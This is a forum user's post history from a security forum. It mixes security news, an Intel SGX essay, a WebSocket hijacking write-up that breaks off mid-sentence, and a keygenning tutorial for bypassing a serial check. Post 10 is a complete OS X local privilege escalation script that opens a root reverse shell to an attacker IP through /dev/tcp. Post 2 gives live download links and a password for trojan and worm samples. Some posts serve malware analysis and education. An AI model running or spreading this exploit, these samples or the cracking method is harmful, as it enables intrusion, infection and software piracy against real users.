Everything posted by Nytro

  1. Internet giants Facebook, Twitter and Google have failed a data privacy test run by a company specializing in online security. This came to light after High-Tech Bridge, an online security firm, ran a test probing the privacy policies of 50 of the largest internet companies, according to the Daily Mail, cited by stirileprotv.ro. A private message containing a web address was sent through the systems of each of the 50 companies. High-Tech Bridge's experts then waited to see who would fall into the trap and access the web address. At the end of the ten-day waiting period, six of the 50 companies had accessed the link placed inside the private message. Among the six were the three giants: Facebook, Twitter and Google. "We discovered that they accessed the link, which should have been known only to the sender and the recipient of the message. If the links are accessed, we cannot be sure that what we write in private messages is not being read by someone," said Ilia Kolochenko, head of High-Tech Bridge. Facebook and Twitter representatives declined to comment on the results of this test, while Google representatives stated that accessing the link does not represent a problem. Sursa: Facebook, Twitter si Google au picat testul de confidentialitate. Cum te spioneaza cei trei giganti - www.yoda.ro
  2. I found this on a friend's laptop. It went by the names "qktier.exe" and "qktier.scr" and infected USB sticks: it creates lots of shortcuts on them and copies itself under many names. The archive contains 2 files: 1. qktier.exe - Trojan.Win32.Agent.xsde 2. Video.exe - Email-Worm.Win32.Brontok.dk (WARNING! It has a folder icon but it is an executable!) I found it interesting that whenever I open cmd, autoruns, or autoruns renamed to something else, it reboots the laptop. I hope to find some time to look into it; I'm curious how it "figures out" what I opened, probably from the window's class name, but I want to be sure. Warning! These files are MALWARE. DO NOT RUN THEM! Download: http://www.speedyshare.com/DKSkQ/RST-malware.rar http://www.girlshare.ro/32811826.3 http://fisierulmeu.ro/52CYWJ9X40D2/RST-malware-rar.html Archive password: rst Try not to infect yourself with it; it can give you real headaches.
  3. 1. How to Create a FUD Backdoor - It depends on what that tutorial involves. If it's "download crypter X and press a button", i.e. for script kiddies, it is not allowed. If it's about a method for obfuscating the .text section, or encrypting the executable's sections and how to write the decryption stub, it's welcome. 2. Infecting your Teachers and School Heads - If it's "go here, download this and run it on the teacher's computer", it has no place here. If it's about scanning the network, finding the teacher's PC, gaining access through a Metasploit exploit and maintaining access through various methods, it is allowed. These are just a few examples. I don't want to see garbage tutorials here; I want quality content only, and I want beginners to stay away from this category. I've edited the first post and added details addressing your question.
  4. This category is dedicated exclusively to malware analysis ("malware" being the generic term for trojans, worms or anything else)! Here you will find: 1. Tutorials on malware analysis 2. Examples of malware analysis 3. Tools needed for malware analysis 4. Malware source code, so it can be analyzed 5. MALWARE SAMPLES! In other words, VIRUSES (in plain terms)! DO NOT RUN the executables you find here! Important rule: 1. Every sample posted here must be explicitly flagged as MALWARE, and it must be made clear that it MUST NOT BE EXECUTED! The category is aimed at people with at least basic knowledge of: - what a sandbox is and what it does - what a virtual machine is and how to use one - useful tools: autoruns, Process Monitor, Process Explorer, Wireshark... - the dangers of malware infection. You may post programs you want analyzed! If you've come across some "suspicious" files and want someone to take a look at them, you can post them here, giving a few details about how you came into possession of the file. WARNING! Nobody will guarantee that a file is or is not infected/malware! Whoever has time can offer some information about the file and SUGGEST whether it is malicious or not. A complete analysis of a program is very complicated and takes a very long time, so you cannot know with certainty whether a file is safe. Upload the files you want analyzed somewhere as a password-protected archive. For simplicity, use the password "rst"! Tutorials on "malware techniques" are allowed as long as everything is for educational purposes (this must be stated in the post). There is an international conference dedicated to malware development, Malcon; personally I see no reason to stop people from learning how such a program really works.
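Since nobody can safely run a suspicious file just to identify it, it helps to post the sample's hashes alongside the password-protected archive; others can then match the exact file against scanning services without ever executing it. A minimal sketch (the helper name is mine, not part of the forum rules):

```python
import hashlib

def fingerprint(path):
    # Read the sample once and compute the hashes commonly posted
    # alongside it, so others can identify the exact file safely.
    with open(path, "rb") as f:
        data = f.read()
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }
```

Posting all three hashes plus the size makes it unambiguous which file is being discussed, even if the archive is re-uploaded elsewhere.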
  5. Xssf Framework : Key-Logging https://www.youtube.com/watch?v=aEvHHERho8E&feature=player_embedded Description: Key logging with XSSF. Module used: use auxiliary/xssf/public/misc/logkeys Sursa: Xssf Framework : Key-Logging
  6. Car Immobilizer Hacking Description: Car manufacturers nicely illustrate what _not_ to do in cryptography. Immobilizers have for a long time increased the difficulty of stealing cars. Older immobilizer transponders defeated thieves by requiring non-trivial RF skills for copying keys. Current transponders go one step further by employing cryptographic functions with the potential of making car cloning as difficult as breaking long-standing mathematical problems. Cryptography, however, is only as strong as the weakest link of key management, cipher strength, and protocol security. This talk discusses weak links of the main immobilizer technologies and their evolution over time. For More Information : - SIGINT 2013 Sursa: Car Immobilizer Hacking
  7. Lsa (Local Security Authority) Secrets-Memory Analysis Description: In this video you will learn how forensic investigators can recover passwords from the registry and LSA secrets, using a memory dump and the Volatility Framework. Sursa: Lsa (Local Security Authority) Secrets-Memory Analysis
  8. [h=1]Keygenning: Part I[/h]Souhail Hammou August 30, 2013 Introduction: A key generator, or keygen, is a computer program that generates a valid "Product Serial or Key" in order to fully register a piece of software. The key generation process may require a name or e-mail to generate the serial; in other cases, where no name or e-mail is required, the validity of the serial may be checked against hardware, or by an algorithm that manipulates the serial's parts to determine whether the provided key is correct. Unlike patching or serial fishing, keygenning is considered one of the hardest cracking techniques, because to code a working keygen you need to fully understand how the serial checking algorithm works. This algorithm may rely on cryptography, for instance MD5 hashing. So, after understanding how the serial checking algorithm works, the reverser must code a program in their favorite programming language that will generate a valid key, serial or license for the targeted software. If the software requires a name or e-mail, and they are involved in the generation algorithm inside the targeted software, the reverser has many ways to code a keygen: one of the simplest is to write a keygen that relies on the SAME instructions used by the software to generate the serial. I think this is what we call a "Ripped Keygen". In my view this is not good keygenning practice, because in many cases it amounts to copy/paste. The better approach is to code an "Unripped Keygen" that does the same thing using a different set of instructions, which will teach you far more than ripping the key-generation routine itself.
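As a toy illustration of a hash-based scheme like the one mentioned above (entirely hypothetical, not the KeygenMe analyzed below): a program might derive the expected serial from the user's name with MD5, in which case an "unripped" keygen simply recomputes the same derivation in its own code:

```python
import hashlib

def expected_serial(name):
    # Hypothetical scheme: the serial is the first 16 hex digits of
    # MD5(name), grouped four by four, e.g. XXXX-XXXX-XXXX-XXXX.
    digest = hashlib.md5(name.encode("utf-8")).hexdigest().upper()
    return "-".join(digest[i:i + 4] for i in range(0, 16, 4))
```

Any name-based check of this kind forces the keygen author to reproduce the derivation exactly, which is why understanding the algorithm matters more than understanding the individual instructions.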
I – KeygenMe: A KeygenMe is a program made by reversers for other reversers; the only accepted solution to a KeygenMe is coding a valid keygen that generates a valid serial or key according to what the KeygenMe needs. To make it "fun" and interesting, I coded a KeygenMe in my favorite programming language, x86 assembly (MASM syntax), with a serial checking algorithm that you will see in detail later in this article. The KeygenMe and keygen download links are in the references below. I'll pretend that I have zero knowledge about this KeygenMe and go from the initial examination all the way to coding a keygen. Let's get started. Examining the KeygenMe: First of all, before starting to debug the KeygenMe, you have to see what it demands from you: is it a serial? A license file? etc. Let's open it and see what it needs: As you can clearly see, the KeygenMe needs our e-mail address and a serial number. After entering a random WRONG serial, the KeygenMe prints "Invalid Serial". With zero knowledge you can't actually guess whether the serial is generated based on the e-mail or not; only debugging the KeygenMe will get you the answer. So let's open it inside Immunity Debugger and see what it has for us. I will start by checking what happens exactly after we provide our e-mail to the KeygenMe: As you see, I tried to write short comments next to the important instructions. What the KeygenMe does with our e-mail is check its validity: it looks for the "@" sign and for at least 4 characters before it. Keep in mind that we're not yet sure whether the e-mail is used in the serial check; it is simply stored at memory address 00403150. As the serial checking routine is a little too big to show in one image, I will explain it part by part. Let's see what the KeygenMe does directly after we provide an input string; as you saw, the input "111122223333444455556666" won't get us anywhere.
Let's discover why: You can clearly see that the KeygenMe checks the input length, checks that the string "ITS-" is present, then locates 3 more dashes (-). So the general serial format the user must supply is: ITS-XXXX-XXXX-XXXX-XXXX, where "ITS-" is a hardcoded string and the X's are unknown to us for the time being. Now let's analyze the next part: This set of instructions simply skips the first DWORD, which is "ITS-", and places each of the four remaining parts of the serial in a separate memory location. For example, the first part after the hardcoded string is placed in a DWORD located at memory address 004051A8. We can suppose that the serial checking algorithm will deal with each part of the serial on its own, but we cannot judge yet, because the algorithm may also link the different parts together. Anyway, let's see what the next instructions deal with: In this phase we start dealing with the serial checking algorithm itself. The serial we provide must have 5 parts, each separated by a dash "-". Since the first part is hardcoded, the algorithm starts directly with the second part. Suppose we provided this serial to the KeygenMe: ITS-1111-2222-3333-4444. All the previous checks would have passed, but this one would not, simply because the 2nd part of the serial, "1111", is WRONG. Let's see what's wrong and how we can fix it. As you can clearly see, the KeygenMe moves the DWORD holding the first part into the EAX register; our input is "1111", so EAX holds "31313131", which is "1111" translated from ASCII into hexadecimal. It then subtracts 30303030h from EAX, resulting in 01010101h. This value replaces the existing value at 004051A8.
Now the KeygenMe does a simple addition of those bytes: 01 + 01 + 01 + 01 = 04, which is not 10h; that's why we jump to the "Invalid Serial" message. For now, just note what you've discovered in Notepad or somewhere you'll remember it, and move on to the third part of the checking routine. The 3rd part's check is quite different from the second one: it compares the first character of our input to the letter "O", then adds the next two bytes to 4Fh (which is "O" in hex), and subtracts the last byte from the sum; the final result is held in BL and must equal 8Fh. Note: you can conclude that in this part it's preferable to use capital letters, ranging in hexadecimal from 41h to 5Ah, in the serial (using numbers is not a bad idea either). Now let's move on to the fourth part's check: The 4th part's check is similar to the second part's; the only difference is that 2 is subtracted from the last byte of the 4th part of the serial, and the resulting value is added to the previous total. The final result must be 10h. I.e., suppose the user managed to pass all the previous checks with correct input, or by patching jumps, which is FORBIDDEN in a KeygenMe; here's what happens with the input "3333": 33333333 - 30303030 = 03 03 03 03. Then 03 + 03 + 03 = 09, the subtraction gives 03 - 02 = 01, and finally 09 + 01 = 0Ah, which differs from 10h, so the jump to the invalid-serial message routine is taken. Let's see what the last check has for us: The same thing happens here as for the second part of the serial; the only difference is that the resulting value must be 12h instead of 10h. Then a conditional jump takes us to the unwanted message when the result differs from 12h.
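For reference, the four part-checks described above can be condensed into a few lines of Python. This is my own reconstruction of the routine from the disassembly walkthrough, not code shipped with the KeygenMe:

```python
def check_serial(serial):
    # Expected format (per the walkthrough): ITS-XXXX-XXXX-XXXX-XXXX
    parts = serial.split("-")
    if len(parts) != 5 or parts[0] != "ITS" or any(len(p) != 4 for p in parts[1:]):
        return False
    p2, p3, p4, p5 = parts[1:]
    # Part 2: sum of (byte - 30h) over all four bytes must equal 10h
    if sum(ord(c) - 0x30 for c in p2) != 0x10:
        return False
    # Part 3: first char is 'O'; 4Fh + b1 + b2 - b3, kept in BL (8 bits),
    # must equal 8Fh
    if p3[0] != "O" or (0x4F + ord(p3[1]) + ord(p3[2]) - ord(p3[3])) & 0xFF != 0x8F:
        return False
    # Part 4: like part 2, but 2 is first subtracted from the last byte
    if sum(ord(c) - 0x30 for c in p4) - 2 != 0x10:
        return False
    # Part 5: same scheme as part 2, but the target is 12h
    if sum(ord(c) - 0x30 for c in p5) != 0x12:
        return False
    return True
```

With this model, "ITS-4444-OPAQ-4446-3366" passes all four checks, while the "ITS-1111-2222-3333-4444" example from the article fails at part 2, exactly as described.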
Now that we've discovered how the KeygenMe checks the validity of our serial, part by part, and that the e-mail has no relation at all to the serial checking algorithm, let's go code a keygen for it. II – Writing a Valid Keygen: We need to program a keygen that generates an unlimited number of random serials. You can write it in your favorite programming language; to practice, you're welcome to write the keygen in any language you want, and why not e-mail me your keygen so I can check it. Random Value Generation: One of the problems you may face is how to generate random characters for the serial. There are several ways to achieve this, and here are some techniques: - GetLocalTime: This API retrieves the current date and time; the interesting thing here is taking advantage of the seconds or milliseconds (which occupy the sixth and seventh WORDs of the SYSTEMTIME structure) to generate a value, especially if you're generating multiple serials. - GetTickCount: This Win32 API retrieves the number of milliseconds elapsed since the system was started (MSDN); GetTickCount returns a 32-bit value in the EAX register. We can take advantage of this return value, especially AL or AH if we're interested in a single byte. In addition, conditions must be set in the code to keep the value in a specific range (printable characters). - Other methods: There are many other ways to generate random values, some of them related to cryptography; Windows provides the CryptGenRandom function for this purpose.
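The GetTickCount trick can be illustrated with a rough Python analogue: take the low byte of a millisecond tick counter and loop until it lands in a printable range (here capital letters, 41h-5Ah), just as the article suggests doing with AL:

```python
import time

def random_printable_byte():
    # Analogue of the GetTickCount approach described above: read the
    # low byte of a millisecond tick counter and retry until it falls
    # in the printable range 'A'..'Z' (41h..5Ah).
    while True:
        b = int(time.monotonic() * 1000) & 0xFF  # low byte of the tick count
        if 0x41 <= b <= 0x5A:
            return b
```

Because the low byte cycles through all 256 values every 256 ms, the loop terminates quickly, but this also shows why tick-based generation can stall for a moment, as the article notes.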
Random Value Generation & Looping: Back to the point where I said you must apply certain conditions when generating a random value; there are two cases when using the GetTickCount API. The first is obligatory: you need a loop in which the return value in AL or AH (if you're interested in generating one byte) must be printable and/or in a specific ASCII character range. The second is dictated by the serial checking algorithm, which may impose additional conditions; for example, the software may refuse a serial containing two identical consecutive characters. This is the main reason the serial generation process may take a few seconds: the keygen keeps looping until it finds a value satisfying the given conditions. We can consider this a drawback, but we can also turn it into a positive point in our keygen with a message telling the user to wait a couple of seconds until a valid serial is generated. Serial Generation: In the KeygenMe we analyzed, you noticed that each part of the serial (4 characters per part) is checked on its own, and that the checks rely on simple math operations such as addition and subtraction. So, to generate a valid part of the serial, we set 3 random characters and solve a simple equation to determine the missing character. You may realize that additional loops must then check that the result of the equation is also a printable ASCII character. The Keygen: Here is the keygen source code, written in x86 ASM / MASM32 syntax (it includes some extra code beyond the serial checking algorithm, for example to avoid two consecutive identical characters). The serial generation steps are commented step by step: https://gist.github.com/SouhailHammou/0746b573136ba3ca0e67 Running the keygen: Assemble then link the keygen's source code and run it.
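The "set three random characters and solve for the fourth" approach described under Serial Generation can be sketched in Python. This is a hypothetical re-implementation of the idea, not the author's MASM keygen; it sticks to digits for the sum-based parts and capital letters for the third part:

```python
import random

def gen_part_sum(target):
    # Pick three random digits, then solve for the fourth so that the
    # sum of (byte - 30h) values hits the target; retry if the solved
    # digit falls outside '0'..'9'.
    while True:
        b = [random.randint(0, 9) for _ in range(3)]
        last = target - sum(b)
        if 0 <= last <= 9:
            return "".join(str(d) for d in b) + str(last)

def gen_part3():
    # First char is fixed to 'O'; pick b1, b2 and solve
    # b3 = b1 + b2 - 40h so that 4Fh + b1 + b2 - b3 == 8Fh;
    # retry until b3 is a capital letter.
    while True:
        b1, b2 = random.randint(0x41, 0x5A), random.randint(0x41, 0x5A)
        b3 = b1 + b2 - 0x40
        if 0x41 <= b3 <= 0x5A:
            return "O" + chr(b1) + chr(b2) + chr(b3)

def generate_serial():
    return "ITS-%s-%s-%s-%s" % (
        gen_part_sum(0x10),      # part 2: value sum must be 10h
        gen_part3(),             # part 3: the 'O' + BL == 8Fh check
        gen_part_sum(0x10 + 2),  # part 4: sum 12h (2 is later subtracted)
        gen_part_sum(0x12),      # part 5: value sum must be 12h
    )
```

Each helper embodies the retry loop discussed above: generate, test the constraint, and loop until a printable solution appears.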
You will be able to generate multiple valid serial numbers for the KeygenMe by pressing the Return key. III – Conclusion: In this article you saw how to analyze a serial checking algorithm and code a key generator that produces different valid serial numbers. No hashing or cryptography was present in this KeygenMe, and the algorithm was quite simple. In the next part I will introduce a harder KeygenMe, with a complete tutorial on how to code a valid keygen for it. References: KeygenMe & Keygen download: IS-KeyGenning Part1.zip Keygen Source Code: https://gist.github.com/SouhailHammou/0746b573136ba3ca0e67 GetTickCount function (Windows) SYSTEMTIME structure (Windows) Keygen - Wikipedia, the free encyclopedia Crackme - Wikipedia, the free encyclopedia Sursa: Keygenning: Part I
  9. [h=3]Thoughts on Intel's upcoming Software Guard Extensions (Part 1)[/h] Intel Software Guard Extensions (SGX) might very well be The Next Big Thing to come to our industry since the introduction of the Intel VT-d, VT-x, and TXT technologies in the previous decade. It seems to promise what so far has never been possible – the ability to create a secure enclave within a potentially compromised OS. It sounds almost too good, so I decided to take a closer look and share some early thoughts on this technology. Intel SGX – secure enclaves within an untrusted world! Intel SGX is an upcoming technology, and there is very little public documentation about it at the moment. In fact, the only public papers and presentations about SGX can be found in the agenda of one security workshop that took place some two months ago. The three papers presented there by Intel engineers provide a reasonably good technical introduction to these new processor extensions. You might think of SGX as a next generation of Intel TXT – a technology that has never really taken off, and which has had a long history of security problems disclosed by a certain team of researchers. Intel TXT has also been perhaps the most misunderstood technology from Intel – in fact, many people thought TXT could already provide secure enclaves within an untrusted OS; this, however, was not really true (even setting aside our multiple attacks), and I have spoken and written about that many times over the past years. It's not clear to me when SGX will make it into CPUs we can buy in the shop around the corner. I would assume we're talking about 3-5 years from now, because SGX is not even described in the Intel SDM at this moment. Intel SGX is essentially a new mode of execution on the CPU, a new memory protection semantic, plus a couple of new instructions to manage it all.
So, you create an enclave by filling its protected pages with the desired code, then you lock it down, measure the code there, and, if everything's fine, you ask the processor to start executing the code inside the enclave. From then on, no entity, including the kernel (ring 0), the hypervisor (ring "-1"), SMM (ring "-2") or AMT (ring "-3"), has the right to read or write the memory pages belonging to the enclave. Simple as that! Why did we have to wait so long for such a technology? Ok, it's not really that simple, because we need some form of attestation or sealing to make sure the enclave was really loaded with good code. The cool thing about an SGX enclave is that it can coexist (and so co-execute) with other code, such as all the untrusted OS code. There is no need to stop or pause the main OS and boot into a new stub mini-OS, as was the case with TXT (this is what e.g. Flicker tried to do, and it was very clumsy). Additionally, there can be multiple enclaves, mutually untrusted, all executing at the same time. No more stinkin' TPMs nor BIOSes to trust! A nice surprise is that the SGX infrastructure no longer depends on the TPM for measurements, sealing and attestation. Instead, Intel has a special enclave that essentially emulates the TPM. This is a smart move, and it doesn't decrease security in my opinion. It merely means we now trust only Intel, versus trusting Intel plus some-asian-TPM-vendor. While it might sound like a good idea to spread the trust between two or more vendors, this only really makes sense if the relation between trusting those vendors is an "AND", while in this case the relation is, unfortunately, of the "OR" type – if the private EK key leaks from the TPM manufacturer, we can bypass any remote attestation, and we no longer need any failure on Intel's side.
Similarly, if Intel were to put a backdoor in their processors, that alone would be enough to sabotage all our security, even if the TPM manufacturer was decent and played fair. Because of this, it's generally good that SGX allows us to shrink the number of entities we need to trust down to just one: the Intel processor (which, these days, includes the CPU as well as the memory controller and, often, also a GPU). Just as a reminder – today, even with a sophisticated operating system architecture like the one we use in Qubes OS, which is designed with decomposition and minimized trust in mind, we still need to trust the BIOS and the TPM, in addition to the processor. And, of course, because SGX enclave memory is protected against access from any other processor mode, an SMM backdoor can no longer compromise our protected code (in contrast to TXT, where SMM can subvert a TXT-loaded hypervisor), nor should any other entity, such as the infamous AMT or a malicious GPU, be able to do so. So, this is all very good. However... Secure Input and Output (for Humans): For any piece of code to be useful, there must be a secure way to interact with it. On servers, this could be implemented by e.g. including the SSL endpoint inside the protected enclave. For most applications that run on a client system, however, the ability to interact with the user via screen and keyboard is a must. So, one of the most important questions is how Intel SGX secures output to the screen from an SGX enclave, and how it ensures that the input the enclave gets is indeed the input the user intended. Interestingly, this subject is not discussed very thoroughly in the Intel papers mentioned above. In fact, only one paper briefly mentions the Intel Protected Audio Video Path (PAVP) technology that could apparently be used to provide secured output to the screen. The paper then references... a consumer FAQ on Blu-ray Disc playback using Intel HD graphics.
There are no further technical details, and I was also unable to find any technical document from Intel about this technology. Additionally, the same paper admits that, as of now, there is no protected input technology available, even at the prototype level, although they promise to work on it in the future. This might not sound very surprising – after all, one doesn't need to be a genius to figure out that the main driving force behind this whole SGX thing is DRM, and specifically protecting Hollywood media against the piracy industry. There would be nothing wrong with that in itself, assuming, however, that the technology could also have other uses that genuinely improve the security of the user (in contrast to the security of the media companies). We should remember that all the secrets, keys, tokens, and smart cards are ultimately there to allow the user to access some information. And how do people access information? By viewing it on a computer screen. I know, I know, this is so retro, but until we have direct PC-brain interfaces, I'm afraid that's the only way. Without properly securing the graphics output, all the secrets can ultimately be leaked. Also, how do people command their computers and applications? Well, again, using those retro things called the keyboard and mouse (touchpad). However secure our enclave might be, without secured input the app would not be able to distinguish intended user input from simulated input crafted by malware. Not to mention such obvious attacks as sniffing the user's input. Without protected input and output, SGX might be able to stop malware from stealing the user's private keys for email encryption or from issuing bank transactions, yet the malware will still be able to command this super-secured software to e.g.
decrypt all the user's emails and later steal screenshots of all the plaintext messages (with a bit of simple programming, the screenshots could be turned back into nice ASCII text to save bandwidth when leaking them to a server in Hong Kong), or, better yet, perhaps just forward them to an email address the attacker controls (perhaps still encrypted, but using the attacker's key). But let's ignore for a moment this "little issue" of the lack of protected input, and the lack of technical documentation on how secure graphics output is really implemented. Surely it is thinkable that protected input and output could be implemented in a number of ways, so let's hope Intel will do it, and do it right. We should remember here that whatever mechanism Intel uses to secure the graphics and audio output, it will surely be an attractive target for attacks, as there is probably a huge monetary incentive for such attacks in the illegal film copying business. Securing mainstream client OSes, and why this is not so simple: As mentioned above, for SGX enclaves to be truly meaningful on client systems, we need protected input and output to and from the secured enclaves. Anyway, let's assume for now that Intel has come up with robust mechanisms to provide these. Let's consider how SGX could then be used to turn our current mainstream desktop systems into reasonably secure bastions. We start with a simple scenario – a dedicated application for viewing incoming encrypted files, say PDFs, performing their decryption and signature verification, and displaying the final outcome to the user (via the protected graphics path). The application takes care of all the key management too. All this happens, of course, inside an SGX enclave (or enclaves). Now, this all sounds attractive and surely could be implemented using SGX. But what if we wanted our secure document viewer to become a bit more than just a viewer?
What if we wanted a secure version of MS Word or Excel, with its full ability to open complex documents and edit them? Well, it's obviously not enough to just put the proverbial msword.exe into an SGX enclave. It is not, because msword.exe makes use of a million other things provided by the OS and 3rd-party libraries in order to perform all the tasks it is supposed to do. It is not a straightforward decision where to draw the line between the parts that are security-sensitive and those that are not. Is font parsing security-critical? Is drawing the proper labels on GUI buttons and menu lists security-critical? Is rendering the various objects that are part of the (decrypted) document, such as pictures, security-critical? Is spellchecking security-critical? Even if the function of some subsystem seems not security-critical (i.e. it does not easily allow leaking the plaintext document out of the enclave), let's not forget that all this 3rd-party code would be interacting very closely with the enclave-contained code. This means the attack surface exposed to all those untrusted 3rd-party modules would be rather huge. And we already know it is essentially impossible to write a renderer for documents as complex as PDF, DOC, XLS, etc., without introducing tons of exploitable bugs. And these attacks now come not from potentially malicious documents (against those we protect, somehow, by parsing only signed documents from trusted peers), but from the compromised OS. Perhaps it would be possible to take Adobe Reader, MS Word, Powerpoint, Excel, etc., and rewrite each of those apps from scratch so that they are properly decomposed into sensitive parts that execute within SGX enclave(s) and non-sensitive parts that make use of all the OS-provided functionality, and further define clean and simple interfaces between those parts, ensuring the "dirty" code cannot exploit the sensitive code.
Somewhat attractive, but somehow I don't see this happening anytime soon. Perhaps it would be easier to do something different – just take the whole msword.exe, all the DLLs it depends on, as well as all the OS subsystems it depends on, such as the GUI subsystem, and put all of that into an enclave. This sounds like a more rational approach, and also more secure. Only notice one thing – we have just created... a virtual machine with a Windows OS inside, and an msword.exe that uses this Windows OS. Sure, it is not a VT-x-based VM; it is an SGX-based VM now, but it is largely the same animal! Again we come to the conclusion of why the use of VMs is perceived as such an increase in security (which some people cannot grasp, claiming that introducing a VM layer only increases complexity) – the use of VMs is profitable because of one thing: it packs all the fat library- and OS-exposed APIs and subsystems into one security domain, reducing all the interfaces between the code in the VM and the outside world. Reducing the interfaces between two security domains is ALWAYS desirable. But our SGX-isolated VMs have one significant advantage over the other VM technologies we have gotten used to over the last decade or so – namely, these VMs can now be impenetrable to any entity outside the VM. No kernel or hypervisor can peek into their memory. Neither can SMM, AMT, or even a determined physical attacker with a DRAM emulator, because SGX automatically encrypts any data that leaves the processor, so everything in DRAM is encrypted and useless to the physical attacker. This is a significant achievement. Of course SGX, strictly speaking, is not a (full) virtualization technology; it's not going to replace VT-x. But remember, we don't always need full virtualization like VT-x; often we can use paravirtualization, and all we need in that case is a good isolation technology.
For example, Xen uses paravirtualization for Linux-based PV VMs, implemented with the good old ring3/ring0 separation mechanism, and the level of isolation of such PV domains on Xen is comparable to the isolation of HVMs, which are virtualized using VT-x. To Be Continued: In the next part of this article, we will look into some interesting unconventional uses of SGX, such as creating malware that cannot be reverse engineered, or TOR nodes or Bitcoin mixers that could reasonably be trusted even if we don't trust their operators. Then we will discuss how SGX might profoundly change the architecture of future operating systems and virtualization systems, so that we would no longer need to trust (large portions of) their kernels or hypervisors, or system admins (Anti-Snowden Protection?). And, of course, how our Qubes OS might embrace this technology in the future. Finally, we should discuss the important issue of whether this whole SGX thing, while providing many great benefits for system architects, should really be blindly trusted. What are the chances of Intel building backdoors into it and exposing them to the NSA? Is there any difference between trusting Intel processors today and trusting SGX as the basis of the security model of all software in the future? Posted by Joanna Rutkowska at Friday, August 30, 2013 Sursa: The Invisible Things Lab's blog: Thoughts on Intel's upcoming Software Guard Extensions (Part 1)
  10. #!/usr/bin/python
# Original MSF Module:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb
###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
###################################################################################################
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))

print """
###############################################################
#
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""

print " [*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)
  11. What do you think about a category dedicated specifically to malware? More precisely:

1. Malware samples (the idea came to me when, having a friend's laptop, I found an interesting piece of junk that reboots the computer when you try to open cmd or autoruns, and that somehow crashes Task Manager when you try to kill processes, among many other things) - with links from which we can download and analyze them.
2. Malware analysis: when we have spare time, some of us could look over such programs and see what they do
3. Posting programs to be analyzed: here anyone, I'd say with a minimum of 100 posts, could post a program they don't trust and "we'll look over it". I don't think anyone will sit down and fully reverse engineer it, but a quick analysis - does it add itself to startup, does it copy itself, does it send who knows what Firefox passwords - can be done
4. Articles on this topic: articles written by other people presenting the analysis of some malware, new things, and interesting techniques they use... And this is not limited to executables; various Java applets, or obfuscated JavaScript code hiding who knows what, are welcome
5. Even malware source code that we could look over would be fine

These are just a few ideas - what do you think? What other suggestions do you have for such a category? Vote on whether it would be worth creating or not.
  12. Cross-Site WebSocket Hijacking (CSWSH)

The relatively new HTML5 WebSocket technique to enable full-duplex communication channels between browsers and servers is receiving more and more attention from developers as well as security analysts. Using WebSockets, developers can exchange text and binary messages pushed from the server to the browser as well as vice versa. During some experiments and pentests with WebSocket-backed applications in the last few months, I came across a scenario where developers might use WebSockets in a way that opens up their applications to a vulnerability I call Cross-Site WebSocket Hijacking (CSWSH), which I will present in this short blog post.

The protocol upgrade

In order to create the full-duplex communication channel, the WebSocket protocol requires a handshake (carried out over http:// or https://) to switch to the WebSocket protocol. This handshake effectively upgrades the communication protocol to ws:// (or wss:// for SSL-protected channels). But this upgrade phase is also a potential attack target and the Achilles' heel of using WebSockets inside an application that deals with non-public data, because it bridges/transfers the HTTP(S)-based communication towards the WS(S)-based WebSocket protocol.

The typical lifecycle of a WebSocket interaction between client & server goes as follows: The client initiates a connection by sending an HTTP(S) WebSocket handshake request. The server replies with a handshake response (all handled by the web application server transparently to the application) and sends a response status code of 101 Switching Protocols. From that point on, both browser and server communicate using the WebSocket API over a completely symmetrical connection (each party can send and receive text and binary messages). On the browser level this is defined by W3C's HTML5 WebSocket API specification and at protocol level via RFC 6455 "The WebSocket Protocol".
Let's take a closer look at this handshake request and inspect the request headers of such a handshake to upgrade the protocol to WebSockets (of an imaginary stock portfolio management application, which uses WebSockets to quickly push new stock quotes to logged-in users as well as receive stock orders from them):

"GET /trading/ws/stockPortfolio HTTP/1.1"
Host: www.some-trading-application.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Sec-WebSocket-Version: 13
Origin: https://www.some-trading-application.com
Sec-WebSocket-Key: x7nPlaiHMGDBuJeD6l7y/Q==
[COLOR=#ff0000]Cookie: JSESSIONID=1A9431CF043F851E0356F5837845B2EC[/COLOR]
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

As you can see from the request headers of the HTTP(S) handshake request, the authentication data (in this example the Cookie header) is sent along with the upgrade handshake. The same would be true for HTTP authentication data. Both are correct browser behaviour according to the aforementioned specification and RFC. Upon a successful WebSocket handshake, the server replies with the 101 Switching Protocols status code, and from then on the ws:// or wss:// based connection is established between browser and server.

The Sec-WebSocket-Key header is part of the browser/server handshake internals (to verify that the server has read and understood the request) and is automatically created and taken care of by the browser initiating the WebSocket request. Regarding client authentication during this handshake/upgrade phase, RFC 6455 reads as follows:

